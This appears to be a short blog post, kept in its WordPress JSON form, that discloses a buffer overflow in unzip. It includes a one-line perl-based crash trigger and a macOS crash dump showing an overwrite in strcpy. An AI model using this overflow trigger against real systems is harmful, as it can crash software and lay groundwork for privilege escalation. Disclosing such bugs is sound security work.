Joachim Schipper have discover interesting security issue in all verison of unzip on unix or linux. The problem is not yet a the coredump generated, but the exploit could lead to escalation of privileges. I seems like unzip can’t handle large files. Don’t see what I mean?<\/p>\n
Well imagine a shell on you favorite ISP on linux or Unix…<\/p>\n
test yourself:
\nunzip `perl -e ‘print “A” x 50000’`<\/p>\n
you’ll get on OSX:
\nException: EXC_BAD_ACCESS (0x0001)
\nCodes: KERN_PROTECTION_FAILURE (0x0002) at 0x0002d000<\/p>\n
Thread 0 Crashed:
\n0 libSystem.B.dylib \t0x90002e80 strcpy + 96
\n1 unzip \t0x000145cc 0x1000 + 79308
\n2 unzip \t0x0000e7fc 0x1000 + 55292
\n3 unzip \t0x00003038 0x1000 + 8248
\n4 unzip \t0x0000240c 0x1000 + 5132
\n5 unzip \t0x000022ac 0x1000 + 4780<\/p>\n
Thread 0 crashed with PPC Thread State 64:
\n srr0: 0x0000000090002e80 srr1: 0x000000000000d030 vrsave: 0x0000000000000000
\n cr: 0x22000022 xer: 0x0000000020000004 lr: 0x00000000000145cc ctr: 0x0000000000000000
\n r0: 0x0000000000000000 r1: 0x00000000bffe7440 r2: 0x000000000000000a r3: 0x000000000002c1ac
\n r4: 0x00000000bffe84f8 r5: 0x0000000000000000 r6: 0x00000000fefefeff r7: 0x0000000080808080
\n r8: 0x0000000041414141 r9: 0x000000000002cffe r10: 0x0000000040404040 r11: 0x0000000048000028
\n r12: 0x0000000080808080 r13: 0x0000000000000000 r14: 0x0000000000000000 r15: 0x0000000000000000
\n r16: 0x0000000000000000 r17: 0x0000000000000000 r18: 0x0000000000000000 r19: 0x0000000000000000
\n r20: 0x0000000000000000 r21: 0x0000000000000000 r22: 0x0000000000020000 r23: 0x0000000000000000
\n r24: 0x0000000000010eac r25: 0x0000000000020000 r26: 0x0000000000000000 r27: 0x00000000bffe76a2
\n r28: 0x000000000001b300 r29: 0x0000000000000001 r30: 0x0000000000000000 r31: 0x000000000002b300<\/p>\n
Binary Images Description:
\n 0x1000 – 0x1afff unzip \t\/usr\/bin\/unzip
\n0x8fe00000 – 0x8fe54fff dyld 44.2\t\/usr\/lib\/dyld
\n0x90000000 – 0x901b3fff libSystem.B.dylib \t\/usr\/lib\/libSystem.B.dylib
\n0x9020b000 – 0x9020ffff libmathCommon.A.dylib \t\/usr\/lib\/system\/libmathCommon.A.dylib<\/p>\n","protected":false},"excerpt":{"rendered":"
unzip security issue, all versions<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3],"tags":[],"class_list":["post-333","post","type-post","status-publish","format-standard","hentry","category-security"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-5n","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/333","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=333"}],"version-history":[{"count":0,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/333\/revisions"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=333"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=333"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=333"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}